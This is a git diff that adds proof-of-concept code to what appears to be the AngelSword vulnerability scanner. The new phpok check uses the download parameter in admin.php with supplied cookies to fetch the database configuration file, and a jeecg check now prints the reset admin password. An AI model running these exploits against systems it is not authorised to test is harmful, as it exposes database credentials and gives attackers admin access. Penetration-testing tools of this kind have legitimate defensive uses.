add poc

README.md

@@ -33,6 +33,9 @@ pymongo
 
 3.所有POC均为开源，以后也一直如此，供大家参考和学习。如果有提供POC的朋友可以私发👇👇邮箱。
 
+# 增加功能
+[+] 增加针对登录后的poc检测，在AngelSword目录下新建cookies.txt文件，将Cookie的值粘贴进去。维持cookie的poc带有标识"需要cookies文件"。
+
 # bugs
 hanmengzi1993@gmail.com
 

cms/cmsmain.py

@@ -6,6 +6,10 @@ referer: unknow
 author: Lucifer
 description: 包含所有cms漏洞类型，封装成一个模块
 '''
+
+#phpok vulns
+from cms.phpok.phpok_res_action_control_filedownload import phpok_res_action_control_filedownload_BaseVerify
+
 #typecho vuls
 from cms.typecho.typecho_install_code_exec import typecho_install_code_exec_BaseVerify
 

cms/jeecg/jeecg_pwd_reset.py

@@ -24,7 +24,7 @@ class jeecg_pwd_reset_BaseVerify:
         try:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"loginController.do?pwdInit" in req.text:
-                cprint("[+]存在jeecg 重置admin密码漏洞...(高危)\tpayload: "+vulnurl, "red")
+                cprint("[+]存在jeecg 重置admin密码漏洞...(高危)\tpayload: "+vulnurl+"\tadmin:123456", "red")
 
         except:
             cprint("[-] "+__file__+"====>连接超时", "cyan")
@@ -32,4 +32,4 @@ class jeecg_pwd_reset_BaseVerify:
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")
     testVuln = jeecg_pwd_reset_BaseVerify(sys.argv[1])
-    testVuln.run()
+    testVuln.run()

cms/phpok/phpok_res_action_control_filedownload.py

@@ -0,0 +1,44 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: phpok res_action_control.php 任意文件下载(需要cookies文件)
+referer: unknown
+author: Lucifer
+description: 参数file未经过滤进入到下载方法导致任意文件下载。
+'''
+import sys
+import json
+import requests
+import warnings
+from termcolor import cprint
+
+class phpok_res_action_control_filedownload_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        headers = {
+            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+        }
+        payload = "/admin.php?c=res_action&f=download&file=_config/db.ini.php"
+        vulnurl = self.url + payload
+        try:
+            f =  open(r'cookies.txt', 'r')
+            cookies = {}
+            for line in f.read().split(";"):
+                name, value = line.strip().split("=",1)
+                cookies[name]=value
+        except:
+            pass
+        try:
+            req = requests.get(vulnurl, headers=headers, cookies=cookies, timeout=10, verify=False)
+            if r"<?php" in req.text and r"host" in req.text:
+                cprint("[+]存在phpok res_action_control.php 任意文件下载(需要cookies文件)漏洞...(高危)\tpayload: "+vulnurl+"\ncookies:"+json.dumps(cookies, indent=4), "red")
+
+        except:
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = phpok_res_action_control_filedownload_BaseVerify(sys.argv[1])
+    testVuln.run()

pocdb.py

@@ -24,6 +24,7 @@ class pocdb_pocs:
             "crossdomain.xml文件发现":crossdomain_find_BaseVerify(url),
         }
         self.cmspocdict = {
+            "phpok res_action_control.php 任意文件下载(需要cookies文件)":phpok_res_action_control_filedownload_BaseVerify(url),
             "jeecg 重置admin密码":jeecg_pwd_reset_BaseVerify(url),
             "typecho install.php反序列化命令执行":typecho_install_code_exec_BaseVerify(url),
             "Dotnetcms(风讯cms)SQL注入漏洞":foosun_City_ajax_sqli_BaseVerify(url),